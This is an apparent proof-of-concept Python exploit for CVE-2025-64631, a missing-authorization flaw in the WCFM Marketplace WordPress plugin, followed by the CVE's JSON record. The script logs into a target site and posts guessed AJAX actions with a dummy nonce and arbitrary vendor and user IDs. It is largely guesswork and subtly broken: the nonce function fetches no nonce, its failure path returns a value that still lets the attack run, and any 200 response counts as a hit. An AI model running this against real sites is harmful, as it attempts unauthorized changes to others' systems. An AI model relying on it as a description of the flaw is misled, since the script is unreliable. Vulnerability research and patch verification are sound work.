CVE-2025-64631

# CVE-2025-64631 PoC - WCFM Marketplace Missing Authorization # Affected: WCFM Marketplace <= 3.7.1 import requests import sys TARGET_URL = "https://target-site.com" # WordPress admin or high-privilege user credentials USERNAME = "admin" PASSWORD = "password" def get_nonce(url): """Get WordPress nonce for authenticated requests""" session = requests.Session() login_url = f"{url}/wp-login.php" # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f'{url}/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return None, session print("[+] Login successful") return session def exploit_authorization_bypass(url, session): """Exploit the missing authorization vulnerability""" # Target endpoint - typically AJAX handler with missing capability check exploit_endpoints = [ f"{url}/wp-admin/admin-ajax.php", ] # Common WCFM Marketplace vulnerable actions vulnerable_actions = [ "wcfm_ajax_controller", "wcfm_settings_update", "wcfm_vendor_settings_update", ] for endpoint in exploit_endpoints: for action in vulnerable_actions: # Construct exploit request with arbitrary user_id # This exploits the missing authorization check exploit_data = { 'action': action, 'wcfm_ajax_nonce': 'dummy', # May be missing validation 'vendor_id': '1', # Arbitrary vendor ID 'user_id': '1', # Arbitrary user ID - exploitation point } print(f"[*] Testing {endpoint} with action: {action}") resp = session.post(endpoint, data=exploit_data) if resp.status_code == 200: print(f"[+] Possible vulnerable endpoint found: {action}") print(f" Response: {resp.text[:200]}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") sys.exit(1) url = sys.argv[1] session = get_nonce(url) if session: exploit_authorization_bypass(url, session)

{"cve": {"id": "CVE-2025-64631", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.330", "lastModified": "2026-04-27T16:16:42.630", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WCFM Marketplace: from n/a through <= 3.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-6-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}